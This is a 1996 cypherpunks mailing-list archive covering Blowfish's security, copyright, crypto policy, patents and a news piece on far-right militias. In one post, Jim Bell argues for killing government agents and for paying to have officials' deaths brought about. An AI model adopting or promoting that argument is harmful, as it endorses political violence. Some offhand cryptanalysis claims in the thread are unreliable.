> They won't sweat over it long. Blowfish was broken.

My understanding is that Blowfish using only 3 rounds, not the full 16, has been
broken.  And yes, duplicate entries in an S-box are weak keys.

carrick uses the full 16 rounds and we check for weak keys.

I'll sleep at night.


Jerry Whiting





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: medea@alpha.c2.org (Medea)
Date: Mon, 15 Apr 1996 03:21:43 +0800
To: cypherpunks@toad.com
Subject: Re: washington post notices archives
Message-ID: <199604141637.JAA04623@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Andrew K. Bressen wrote:

>we here at HKS.net have today received a cease and desist
>letter from the washington post regarding editorial copy 
>of theirs that was evidently posted to c'punks and then
>abosrbed into our c'punk archives.

  IMO, if you didn't remove the material from your archives, the Washington Post wouldn't be able to press the issue any further.
  Email posted to a listserv enters into and becomes the possession of the public domain.  If they ran a search looking for their material, then obviously credit was appropriately given to the quote.
  The Unabomber's Manifesto was posted on the Net.  Since the Post published it in its entirety, then they have a right to tell me to remove it if I had downloaded it?
  Personally, I think the letter is full of the stuff one would step into out on the range where the deer and the antelope play.

Medea


============================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ |---------------------------------------------| +
+ | The mind is its own place, and of itself    | +
+ | Can make a heaven of hell, a hell of heaven | +
+ |---------------------------------------------| +
+++++++++++++++++++++++++++++++++++++++++++++++++++









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Mon, 15 Apr 1996 00:21:22 +0800
To: perry@piermont.com
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <199604140849.EAA05136@jekyll.piermont.com>
Message-ID: <96Apr14.100201edt.1826@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Jerry Whiting writes:
> > One reason we chose to use Blowfish as the basis for carrick is that
> > it _is_ a new algorithm.  One has to assume that the NSA et al. has
> > tools optimized to crack DES and possibly IDEA/RSA.  At least let's
> > give them something else to sweat over.
> 
> They won't sweat over it long. Blowfish was broken.

Yikes!  Are you sure?  This is the first I've heard of it.  This would mean
that PGPPhone is not secure.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 15 Apr 1996 00:44:13 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <96Apr14.100201edt.1826@cannon.ecf.toronto.edu>
Message-ID: <199604141422.KAA05302@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



SINCLAIR DOUGLAS N writes:
> > Jerry Whiting writes:
> > > One reason we chose to use Blowfish as the basis for carrick is that
> > > it _is_ a new algorithm.  One has to assume that the NSA et al. has
> > > tools optimized to crack DES and possibly IDEA/RSA.  At least let's
> > > give them something else to sweat over.
> > 
> > They won't sweat over it long. Blowfish was broken.
> 
> Yikes!  Are you sure?

At least partially broken, yes. I've forgotten the details. I believe
they were discussed at Eurocrypt. It may be that with the full number
of rounds that no one yet has a cryptanalysis but I don't recall and
it doesn't particularly matter from my perspective.

> This is the first I've heard of it.  This would mean
> that PGPPhone is not secure.

I was unaware that PGPPhone used Blowfish, but if it does that was a
stupid idea in the first place.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 15 Apr 1996 05:09:26 +0800
To: Jerry Whiting <cypherpunks@toad.com
Subject: Re: Blowfish ain't broken
Message-ID: <2.2.32.19960414181603.00a9f404@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:28 AM 4/14/96 -0700, Jerry Whiting wrote:

>> Perry writes:
>> They won't sweat over it long. Blowfish was broken.
>
>My understanding is that Blowfish using only 3 rounds, not the full 16, has
been
>broken.  And yes, duplicate entries in an S-box are weak keys.
>
>carrick uses the full 16 rounds and we check for weak keys.

I thought there was a variant of Blowfish that fixed the problems that had
been found with the algorythm.  I believe it was called "Blowfish-SK". (I
need to check my archives for further details.)  

Are you using the original Blowfish or the improved version? 
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 15 Apr 1996 01:38:51 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: [long rant] Re: Watch your language, Shabbir.
In-Reply-To: <3170F667.6EEA@vail.tivoli.com>
Message-ID: <Pine.3.89.9604141047.B18706-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I promise myself to go back to lurking mode after this.

On Sun, 14 Apr 1996, Mike McNally wrote:

> The choice of words was exceedlingly poor if that's what he really meant.
> Though I agree that it's unlikely any LEA will give up capabilities it's
> grown to imagine is has a "right" to have, I haven't stopped objecting.

None of us have stopped objecting, except that now we have methods of 
preventing it on our own. One must remember that while the basic uses of 
crypto are not only reasonable and even essential in some cases, the full
application leads to some very objectionable extremes (regulatory 
arbitrage, full anon digicash, easier drug sales, gutting of income 
taxes...). 

Now being one of those people who enthusiastically supports those extremes,
I have to ask myself, how will we get there with the least interference?

Now for one thing I wouldn't go around repeating the indignant 
"unconstitutional US government" threads on oh let's say 
talk.politics.libertarian (or .crypto) to the faces of legislators and 
the media. One doesn't get the ITAR repealled by telling congress that 
child porn and mafia conversations will become impossible to police and that
the first amendment lets us shout "fire" in a theatre (though I think it 
does).

I would leave all the carping and "four horsemen"ing to Louis Freeh.
That makes him sound unreasonable. "Sounding" reasonable may be the best way
for our crowd to keep legal the tools that will help us do "unreasonable" 
(though not from our perspective) things. So as long as Shabbir & co 
insert statements supportive of crypto deregulation, I really don't care 
what the rest of their speeches say, the rest is only packaging.
(Though one must determine what's the packaging and what's the content.)

(And if I were in his shoes, I probably wouldn't be saying anything 
different. I may be an anarchist, but I call myself a free-marketeer.
Same thing but not the same-sounding thing, get it? Politics is 
unfortunately very backwards. As long as the civil lib'ers tow enough of our 
party line and get the job done, I'm happy with 'em.)

I leave the judgement call up to you, Mike. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 15 Apr 1996 04:34:45 +0800
To: cypherpunks@toad.com
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <199604141422.KAA05302@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.92.960414121820.358A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 14 Apr 1996, Perry E. Metzger wrote:

> At least partially broken, yes. I've forgotten the details. I believe
> they were discussed at Eurocrypt. It may be that with the full number
> of rounds that no one yet has a cryptanalysis but I don't recall and
> it doesn't particularly matter from my perspective.

I haven't heard of any efficient cryptanalysis against Blowfish.  I know there
are weak keys, but they are difficult to exploit.  16 round Blowfish can be
broken using differential cryptanalysis with 2^128+1 chosen plaintexts.

>
> > This is the first I've heard of it.  This would mean
> > that PGPPhone is not secure.
>
> I was unaware that PGPPhone used Blowfish, but if it does that was a
> stupid idea in the first place.

Blowfish is unpatented, free for commercial use, and very fast so I don't see
how the use of Blowfish could be considered stupid.  IDEA and triple-DES may
be more secure, but I think that they are too slow for voice communication.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMXEmo7Zc+sv5siulAQFNugP/eajuzeBDrGi5LfQy5IYANVzYnt/FRQYF
egUkJuWtkxI8ff/CzS9dKxOW95c8SuvYyis9D8NfwAcPesKI/YQp734l/v+NYH4V
G7AZvzdLEKpDWVzo524o326o4ufXV7ycysLNq4yrkPJ5LJyLdm5A3z/0IYeoXStK
2HWAf22Iksc=
=cwEh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Bender <dbender@cupidnet.com>
Date: Mon, 15 Apr 1996 02:52:33 +0800
To: cypherpunks@toad.com
Subject: Anybody know of a WinNT Remailer?
Message-ID: <199604141641.MAA05719@junior.wariat.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm not sure if this is really the right place to ask this, but...

Does anyone know of a remailer that will work on Windows NT???

Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 15 Apr 1996 04:29:52 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [increasingly irrelevant] Re: Watch your language...
In-Reply-To: <m0u8UBq-0008z1C@pacifier.com>
Message-ID: <Pine.3.89.9604141344.A21471-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Enough of this thread.

On Sun, 14 Apr 1996, jim bell wrote:

> Exactly!  I think the issue is important enough so that we really ought to 
> develop new wording, something that far more accurately reflects the bulk of our
> opinion towards wiretapping.

The quote should be taken in context. If you look at the whole thing 
(it's still at www.vtw.org) he was talking about a corrupt cop who had
killed a mother of three while he was being wiretapped by the FBI.
The wiretap did nothing to save her.

He continues in the same sentence as the one we're disputing, to question 
the effectiveness and utility of wiretaps in light of this and does so 
throughout the rest of the text. Come on, Jim, no offense meant, but 
there's criticizing and then there's nitpicking. One half of one 
sentence does not sell out the whole argument, no matter how it's 
worded. We're not in court, let's not waste our time on semantics.

Cheers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Apr 1996 08:05:39 +0800
To: cypherpunks@toad.com
Subject: Re: math patents
Message-ID: <m0u8Ysr-0008yhC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 AM 4/14/96 -0800, Lee Tien wrote:
>In reply to the message excerpted below:
>
>I believe Jim's not looked back far enough.  My recollection from law
>school is that the law was friendly to math patents in the period before
>the Supreme Court weighed in.  There were some PTO denials, which courts
>reversed (I think the Court of Claims heard these back then).  So I think
>the trend was toward patenting processes even if mathematical until
>Gottschalk v. Benson.  It's a conceptually messy area because "processes"
>have long been patentable (like the Morse telegraphy/Bell telephony
>patents) but the Supreme Court saw the Benson application as violating the
>doctrine against patenting "laws of nature."  
>
>Lee

I seem to recall reading that one of the breakthrough "algorithm" patents 
was from the 1970's, in which a rubber-curing/molding process's cure time 
was determined by a mathematical formula based on heat, pressure, mold 
shape, and a number of other variables.   I don't really object to 
this, because some engineering tasks are complicated and mathematical 
formulas are required to solve them optimally.  However, I  don't see the 
basis for patenting what is just about pure mathematics, and RSA is very 
close to pure math.  The fact that there is a practical use for it is almost 
a secondary consideration.   

If factoring numbers were easy, RSA wouldn't have been useful, even though 
the math would still have "existed," at least theoretically.  Clearly, it is 
not the math itself which is useful; it is a specific characteristic of that 
math, its difficult reversibility.  A person looking for a mathematical 
algorithm to apply to public-key cryptography probably doesn't try to do new 
math; what he tries to do is to find old math that has this characteristic.  
Had mathematics always been patentable, the patent on that math would have 
expired at least decades, and possibly centuries ago.

In any case, I don't think it's unrealistic to suspect that the government 
was playing games with the patent system due to RSA.  After all, let's get 
back to basics:  What, exactly, does a patent do?  A patent on RSA doesn't 
prevent the EVIL SOVIETS from using it.  It doesn't "allow" the USG to use 
it; if there was no patent on it they'd be able to use it for free.  The 
only thing a patent on RSA might arguably do is to keep other people, mostly 
Americans, from using it.  That's right, the patent system was actuallly 
denying the public this system.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Mon, 15 Apr 1996 05:07:35 +0800
To: cypherpunks@toad.com
Subject: key bit lengths
Message-ID: <31713CED.42E2@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


In Applied Crypto, it talks about thermodynamic limitations of brute 
force attacks.  I did some calculations and it looks like it will take, 
given a perfectly effecient computer, the combined energy of 509,485,193 
average supernovas to brute force a 256 bit key. I was just wondering if 
there are any theoretical ways around this. I am just talking about 
plain brute force here, not attacking other weaknesses.
-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 15 Apr 1996 04:58:50 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <96Apr14.100201edt.1826@cannon.ecf.toronto.edu>
Message-ID: <Pine.3.89.9604141322.A21250-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 14 Apr 1996, SINCLAIR DOUGLAS N wrote:

> > They won't sweat over it long. Blowfish was broken.
> 
> Yikes!  Are you sure?  This is the first I've heard of it.  This would mean
> that PGPPhone is not secure.
> 
If it's the one that's in applied crypto 2 (p.339) and ddj, then it's only a 
partial crack on a low number of rounds (according to AC2). Schneier still 
thought it was secure at the time of the publishing of AC2, but then he 
may be biased. (and since this is crypto why not be paranoid, eh?)
ú   
Besides, doesn't PGPfone give you a choice of algorithms? (including IDEA?)
I haven't gotten it yet, no sound card.

Perry, you've mentioned this before, was this the same crack that's in 
the book or something newer? (paper references?)

(I just caught your reply to Sinclair after writing this. In any case 
Schneier lists the diff. cryptanalysis of blowfish paper as unpublished.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 15 Apr 1996 08:37:16 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: "Contempt" charges likely to increase
Message-ID: <m0u8Z2k-0008yfC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM 4/13/96 -0400, Black Unicorn wrote:
>
>I will not, of course, reply to Bell's reply.


That's strange.  George Orwell (in the book "1984") said "Freedom is 
slavery.  War is Peace."  etc.  In 1993 Waco, the FBI said "This is not an 
attack!"

Today, Unicorn says, "I will not, of course, reply to Bell's reply"

I would have to agree that yours is not a _good_ reply, but it sure appears 
to be some kind of reply, despite your silly claim.

>On Sat, 13 Apr 1996, jim bell wrote:
>
>> At 07:59 PM 4/12/96 -0400, Black Unicorn wrote:
>
>> >The government of the United States doesn't play "fair" when they want 
>> >something.
>> 
>> But if the government of the United States does play "fair," then why can 
we 
>> not play "fair" and kill their agents who violate what we feel is our 
>> rights?
>
>Are you planning on affording them due process rights? 

There are over 150 nations in this world, today.  Each of them probably has 
a different view of what "due process rights" are.  Which nation's "due 
process rights" are you referring to?  And are you referring to the letter 
of the law (or Constitution) or merely what passes for "due process" in each 
of these countries?   Are you showing your biases by using a term of art 
such as "due process rights" at all?

In any case, not all criminals at not all times are entitled to "due 
process."  Self-defense is legitimate, without trial, in the case of an 
emergency.  I suggest that what constitutes an "emergency" depends on the 
likelihood of getting assistance and justice if that self-defense and 
counter-attack is foregone.   If you've just managed to tie your attacker to 
a tree, and the cops are a phone call away, society declares that you 
shouldn't shoot him, and should let the court system handle it.  However, if 
you're a black in 1955 Mississippi, and the sheriff's brother has just 
attacked you with a knife out in the woods and you grab a gun and are 
holding him at bay, I think it is not unreasonable to conclude that the 
fairest outcome that you can expect is to shoot him dead for his stupidity, 
then run and hope that nobody figures out who did it.

And the whole basis for asking people to forego their own version of justice 
is simple:  Society claims that courts exist to provide justice, and also 
claims that a criminal who's caught will get a fair trial.  But it's obvious 
that government will not judge its own agents fairly (except in unusual 
cases where incriminating videotape exists, and sometimes not even then), so 
there is no presumption that a person victimized by government can expect 
justice.  I think it's clear that whatever "social contract" that you might 
want to claim exists no longer applies in such a circumstance, and it's 
reasonable to act entirely outside the current "justice system" in those 
circumstances.  Naturally, government thugs will disagree, but they're PAID 
to disagree!


> What about other 
>rights generally?  At least the U.S. government attempts to do this. 

More accurately, it occasionally attempts to APPEAR to do this.  But since 
the government, through the SC, claims to be the final arbiter of what those 
"due process rights" are, you can't expect an unbiased opinion from it in 
this area.


> How about a trial, or does it merely take a single bidder with 
>money to have someone offed?  Sounds like tyrrany of the rich to me.  I 
>might add that if this is the way things were the richest would be the 
>survivors, able to kill their enemies, protect themselves better, and 
>deploy their own agents. 

In fact, to a "rich" person it would look like quite the opposite situation! 
 Even a relatively small number of non-rich people could finance his death, 
and he wouldn't even know who his enemies are.  As usual, you show almost 
not grasp of the concept.  Your opposition is based on your desire to 
maintain the current tyrannical system, or at least enough of it to allow 
you to keep your current privileged position. 

>> After all, the government is merely the representative of the 
>> people (at least in theory!) and it 'must' follow the rules (laws, 

>> Constitution, etc).
>
>I think the U.S. government does a much better job at this than almost 
>any other sovereign excepting perhaps the U.K., which has still had its 
>share of self contradiction.

Is that relevant?  I don't recall ever having stated or implied that the USG 
is the worst offender, either qualitatively or quantitatively.  However, it 
_is_ an offender.  Sounds like you're trying to set up a straw-man again; 
par for the course for you.

>> To whatever extent it exceeds those limits, and to 
>> whatever extent the public can't get justice to prevent those violations, 
>> why would the public be obligated to accept them?
>
>Really Mr. Bell has recognized something important, though I'm not sure 
>even he realizes it. 

Unfortunately, I think that Unicorn hasn't recognized anything.

> Specifically, that when his allies are so few in 
>number he must resort to general terrorism and low intensity conflict to 
>have any hope of success at all.

I've never supported "general terrorism."  In any case, the term has been 
abused over the years so that it carries a lot of rhetorical baggage.  If 
you know of a "terrorist" that would  prefer to attack innocent civililians 
(those who are not government employees) instead of the people who are 
really causing the trouble, please  tell me who he is.   And 
"low-intensity conflict", in many cases, exists ONLY because the government 
maintains it.  Much of the warfare in the inner cities, for instance, exists 
ONLY because of the so-called "war on drugs."    I think it's realistic to 
conclude that this is not simply an accident.


>> To believe otherwise is to believe that the government has some sort of 
>> special dispensation to violate the law.  I don't believe this; it wouldn't 
>> surprise me to hear that you do, however.  Which is it?
>
>I don't believe anyone has any special dispensation.  It's all a question 
>of who can get away with it. 

For a long time, governments at all levels and in all countries have been 
"getting away with it."  I favor a system that makes this impossible.  You don't.

> For all your moaning and whining, you are 
>still less able to get away with it than agents of the CIA and the men on 
>top.  It must be killing you.  I can feel the way the knife twists in you 
>with the realization that you are another small gear in the machine.

What gear?  which machine?  I must be a gear that got away!


>You and the Unabomber.  Horrified at the thought that you might be 
>insignificant.  Driven by the need to be important, noticed.

Having not read his manifesto, I hesitate to comment.  However, from what 
I've read about it, he's long on discussing what he sees as being the 
problem, short on prescribing a practical solution. And he seemed to select 
his targets without regard to whether killing them would do any "good."    
I'm quite the opposite: 
 I don't pretend that my AP essays contain a complete description of what I 
see as the problem, or even the outline of it.  In fact, I carefully avoided 
the issue in most cases, for that would have increased its length manyfold.  
(I assumed that most people who read it would already have at least been 
aware of many problems, whether or not they conclude that my solution is 
justified by them.  I don't claim that my view of the problems is somehow 
special, merely that everyone knows of enough problems to justify 
formulating a solution.) 

My solution, however, despite being distasteful to some people, is 
frequently if not usually thought of as being not only possible, but in fact 
practical.


>Some people work to change the system by developing structures to work 
>within it, or around it.


I intend to go THROUGH it, every bit of it.  But it isn't just me; 
essentially everthing I've described is merely the unavoidable consequence 
of the modern developments of networking, good encryption, and digital cash, 
three facts that no government is going to be able to stop.  Some of what 
I've discussed was considered years ago by others; I've merely extended it.


>You call for the assassination of (not even particularly important) 
>public officials on the whim of the individual who happens to have cash.

 That's not true.  Hey, they can always resign!  And I've repeatedly stated 
that most of them will resign, especially when their paychecks stop coming.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 15 Apr 1996 05:05:27 +0800
To: cypherpunks@toad.com
Subject: Re: carrick, Blowfish & the NSA
In-Reply-To: <199604140849.EAA05136@jekyll.piermont.com>
Message-ID: <Pine.3.89.9604141414.B21250-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



 Jerry Whiting writes:
 > One reason we chose to use Blowfish as the basis for carrick is that
 > it _is_ a new algorithm.  One has to assume that the NSA et al. has
 > tools optimized to crack DES and possibly IDEA/RSA.  At least let's
 > give them something else to sweat over.

Algorithms die. If you want to publish and implement an API that will last,
try to improve on of the many multi-algorithm specs that are already out 
there. If the next round of research kills one particular algorithm, your 
work will then still not be wasted. (Apologies for writing something so 
obvious and general.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 15 Apr 1996 06:36:40 +0800
To: cypherpunks@toad.com
Subject: Re: key bit lengths
In-Reply-To: <31713CED.42E2@iconn.net>
Message-ID: <Pine.LNX.3.92.960414141633.893A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 14 Apr 1996, Jack Mott wrote:

> In Applied Crypto, it talks about thermodynamic limitations of brute
> force attacks.  I did some calculations and it looks like it will take,
> given a perfectly effecient computer, the combined energy of 509,485,193
> average supernovas to brute force a 256 bit key. I was just wondering if
> there are any theoretical ways around this. I am just talking about
> plain brute force here, not attacking other weaknesses.

I doubt it.  This calculation is based on the minimum amount of energy
needed to invert a bit.  The amount of energy is a function of the temperature,
so a brute force attack might take much less energy several billion years
hence, since the universe will cooled off more.  There only way for there to
be any way around this, is if a way was found to lower the termperature to
near absolute zero consuming a very little amount of energy, or if some way
was found to invert a bit using less energy than is currently believed (very
doubtfull).  Of course, if P=NP, then brute-force attacks will be pointless.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMXFCPbZc+sv5siulAQF2jAP9GgSk+YqNjcnyThzs6ow1Ecyp60iK0kiE
Y9RMqLtdwpMv2Jx10KigDsyOvQrM0+W/RJ3Q2Zka+VF4aBT82z5NcbUvzEG4Y1iT
t12PZF8rhFgxNB+jNOOCxS0BYRcFAC3epZ050+gRdtOenLLNsczyrXJN+fMyaTAf
gnCis3s1n1o=
=Rvcm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 15 Apr 1996 05:17:10 +0800
To: cypherpunks@toad.com
Subject: NOS_tal
Message-ID: <199604141822.OAA19475@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-14-96. TP:

   "Was McCarthy Right About the Left?"

   Citing the Venona program decryption "revelations,"
   Nicholas von Hoffman polemicizes about the consequences of
   the left's refusal to face that McCarthy may have been more
   truthful about communist infiltration of the USG than he
   knew. Von Hoffman recounts the high points of the 50-year 
   history of left dissimulation and avenges the right with
   a nostalgic nukem dead red-under-bedder:

      As yet unexplored is the possibility that certain
      features in the political culture of the American left
      are hand-me-downs from this period. The "elitism" and
      didacticism that so gall its opponents may be a morphed
      version of the communist doctrine of vanguard
      leadership. The liberal penchant for government
      gigantism, complex bureaucracy and central planning may
      also have taken root in the liberal admiration of the
      Soviet system in the 1930s.

   NOS_tal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Mon, 15 Apr 1996 00:08:08 +0800
To: cypherpunks@toad.com
Subject: Enemies R Us
Message-ID: <199604141330.OAA00385@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


New York Times, 14 April 1996

Private Groups Lead Charge in War on Far Right

By Michael Janofsky

Washington. In the year since the worst terrorist act on
American soil, the bombing of a Federal building in Oklahoma
City that killed 168 people, the number of right-wing groups
harboring anti-government sentiments has been estimated at
mnre than 800, by some counts, and they now operate in every
state.

These are organized groups of militias, white supremacists,
neo-Nazis- skinheads, survivalists and constitutionalists who
are connected to each other with increasing frequency by the
Internet, fax machines and a shared belief in Christian
Identity, a renegade religious concept that. proclaims whites
to be God's chosen people, Jews to be descendants of Satan and
blacks to be subhuman.

At the same time, however, as Federal agencies proceed with
traditional means of intelligence gathering (as in the
Unabomber case), and Congress ponders a new anti-terrorism
bill (stalled by the gun lobby and civil libertarians),
efforts to fight domestic terrorism are being supplemented
more than ever by private human rights organizations that
track the fringe right with their own networks. They willingly
share information with law enforcement agencies, branches of
the military and reporters.

Federal law enforcement agencies, which were heavily
criticized for their actions in fatal controntations in Ruby
Ridge, Idaho, and Waco, Tex., appear to be trying a new, more
patient approach in waiting for a peaceful solution to the
current standoff with the anti-government group called the
Freemen in eastern Montana. They have been criticized this
time, largely by neighbors of the Freeman and local officials,
for waiting so long to get involved, and for waiting at all.

Undercover Work

Most of the human rights organizations were actively
campaigning against racism and anti-Semitism long before the
Oklahoma City bombing on April 19, 1995 and the arrest of two
suspects with links to militia groups. And with many of the
right-wing groups now hiding racist views beyond a more
acceptable veneer of anti-government oratory, the human rights
groups say the need to collect information has become that
much more critical.

At least two of them -- the Southern Poverty Law Center in
Montgomery, Ala., and the Simon Wiesenthal Center in Los
Angeles -- use undercover operatives. Both organizations had
spies attend a convention last weekend in Lake Tahoe that
attracted hundreds of Christian Identity followers to hear a
speech by Randy Weaver, the white separatist whose wife and
son were killed three years ago in a siege by Federal agents
in Ruby Ridge.

The Southern Poverty Law Center has computer files of more
than 12,000 people identified as members of a far-right group.
The Wiesenthal Center operates an extensive electronic
tracking station, where researchers monitor television, cable
and radio shows all over the world for racist and anti-Semitic
content.

When the Army recently conducted an internal investigation to
learn how many soldiers were involved with skinhead groups,
senior officers at the Pentagon twice conferred with
Wiesenthal Center officials, and when Patrick J. Buchanan was
running for the Republican Presidential nomination, they
produced names of Buchanan supporters who once worked for
David Duke, a former Ku Klux Klan member, or had affiliation
with the National Association for the Advancement of White
People.

Law enforcement agencies have credited the human rights groups
with helping the public become more aware of the beliefs,
factions and heroes of the far-right fringe. The human rights
groups see their efforts as a necessary antidote to the
sympathetic treatment of far-right groups on conservative talk
radio programs, and to the reluctance of some conservative
politicians to criticize the extremists. But the work may have
also produced some unintended consequences.

Writing in The Jubilee, a publication of the Christian
Identity movement, a former militia leader from Alabama, Jeff
Randall, said the drumbeat of concern over domestic terrorism
has served as a welcome recruiting device for militias and
other right-wing groups.

"Throughout all this," he wrote, "the militias became stronger
and better organized.

"Many people are wondering if the militia movement is still
alive and well," he added. "The answer to that question is a
resounding 'yes.' "

-----

Full page ad:

"False Patriots: The Threat of Antigovernment Extremists"

Fast-Growing "Patriot" Movement Poses Danger of Domestic
Terrorism


Early Warnings

In October 1994, Morris Dees warned Attorney General Reno that
white supremacists were infiltrating the "Patriot" militia
movement. He called the development "a recipe for disaster."

Six months later, a powerful bomb destroyed a federal building
in Oklahoma City, killing 168 people. The country soon learned
that Tim McVeigh, the prime suspect in the attack, had
neo-Nazi ties and connections to the "Patriot" network, the
combination that Dees had seen as so explosive before the
bombing.

Now, Dees and his colleagues at the Southern Poverty Law
Center have again warned the Attorney General about the danger
posed by the antigovernment "Patriot" movement. In an April 9,
1996 letter, Dees urged Reno to take concrete steps to counter
the threat of further domestic terrorism. He also provided her
with a copy of *False Patriots*, the Center's new report on
the "Patriot" movement. This 72-page expose is the culmination
of a Center investigation into the "Patriot" movement
conducted since the Oklahoma City bombing.

United By Hate

The "Patriot" movement encompasses numerous elements of the
American right, from certain Christian fundamentalists to the
Ku Klux Klan. It includes tax protesters, survivalists and
neo-Nazis, as well as radical anti-environmentalists and gun
enthusiasts. The tie that binds those in the movement,
estimated by some at five million strong, is a virulent hatred
of the federal government.

This hatred has been fueled in recent years by the passage of
gun control legislation, the deaths of Randy Weaver's wife and
son at the hands of federal agents on Ruby Ridge in Idaho, and
the disastrous federal assault on the Branch Davidian compound
in Waco.

The False Patriots report reveals the people behind the
"Patriot" movement, people like Louis Beam, a key Aryan
Nations leader, and Pete Peters, a pastor of the bizarre
Christian Identity faith. It identifies over 800
antigovernment "Patriot" organizations, including 441
unauthorized militia groups. It describes how "Patriot"
paramilitary units are preparing for war with the federal
government. It offers an inside look at guerrilla literature
and the tools of terrorism. It documents crimes linked to the
"Patriot" movement, including plots to blow up other federal
buildings. It demonstrates that the "Patriot" movement poses
"a clear and present danger" to the nation.

Expect More Bombs

Immediately after the Oklahoma City disaster, a spokesperson
for the Militia of Montana predicted more antigovernment
violence. "Patriot" groups flooded the underground book market
and the Internet with manuals on bomb-making, railroad
sabotage and the production of deadly chemicals. "Patriot"
leaders openly suggested the need to kill government
officials.

Since the Oklahoma City tragedy, numerous "Patriot" terrorist
plots have been discovered, including plans to poison federal
employees in Minnesota and conspiracies to blow up a federal
courthouse in Spokane and an IRS building in Reno. An AmTrak
train was derailed by a group calling itself "Sons of the
Gestapo."

Over ten tons of explosives have been stolen from various
locations around the country in the past year. Authorities
suspect a large quantity has made its way into the "Patriot"
movement. In December, a survivalist was arrested in the Ozark
Mountains of Arkansas and charged with terrorism. He had
produced 130 grams of the deadly poison ricin, enough to kill
thousands.

